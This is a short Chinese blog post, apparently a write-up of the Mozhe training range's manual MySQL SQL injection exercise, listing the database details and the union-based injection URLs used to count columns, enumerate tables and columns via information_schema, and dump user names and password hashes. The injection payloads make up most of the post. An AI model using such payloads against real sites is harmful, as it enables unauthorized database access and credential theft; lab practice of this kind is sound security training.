sql手工注入漏洞测试(MYSQL)-墨者-url信息

背景:

自己在墨者官网靶场练习的时候,一直出错,手工容易出错,所以列举一些信息供大家核对,可以参考改动。

bash 复制代码
数据库版本version()              5.7.22-0ubuntu0.16.04.1
当前数据库名称database()        mozhe_Discuz_StormGroup
当前数据库用户user()             root@localhost
操作系统@@version_compile_os    Linux

信息:

一、猜列

bash 复制代码
124.70.22.208:45582/new_list.php?id=-1 order by $number

结果:1,2,3,4,只显示2,3

二、inmation_schema查表:

bash 复制代码
124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'

查询结果:StormGroup_member,notice

三、①StormGroup_member表中的列:

bash 复制代码
124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'

查询结果:id,name,password,status

四、②notice表中的列:

bash 复制代码
124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='notice'

查询结果:id,title,content,time

分析:显然StormGroup_member表中的列更符合预期,查其中的数据

五、查name,password:

bash 复制代码
124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(name),group_concat(password),4 from StormGroup_member

查询结果,有两个name和对应的password。

总结:

md5解密后只有一个name可以使用。手工注入较为繁琐,但能锻炼对漏洞的理解,读者们发现问题可私信交流。

相关推荐
路多辛几秒前
Golang database/sql 包深度解析(二):连接池实现原理
数据库·sql·golang
SimonKing10 分钟前
Mybatis批量插入,形式不同性能也不同
数据库·后端·程序员
小卓笔记44 分钟前
MySQL库表操作
mysql
iVictor1 小时前
MySQL 密码防暴力破解插件:Connection Control
mysql
Fine姐1 小时前
The Network Link Layer: 无线传感器中Delay Tolerant Networks – DTNs 延迟容忍网络
开发语言·网络·php·硬件架构
Seven971 小时前
了解Mysql优化吗?如何优化索引?
mysql
rannn_1111 小时前
【MySQL学习|黑马笔记|Day7】触发器和锁(全局锁、表级锁、行级锁、)
笔记·后端·学习·mysql
杰克尼1 小时前
MYSQL-175. 组合两个表
数据库·mysql
DemonAvenger1 小时前
MySQL索引原理深度解析与优化策略实战
数据库·mysql·性能优化
网络研究院2 小时前
新的“MadeYouReset”方法利用 HTTP/2 进行隐秘的 DoS 攻击
网络·网络协议·安全·http·攻击·漏洞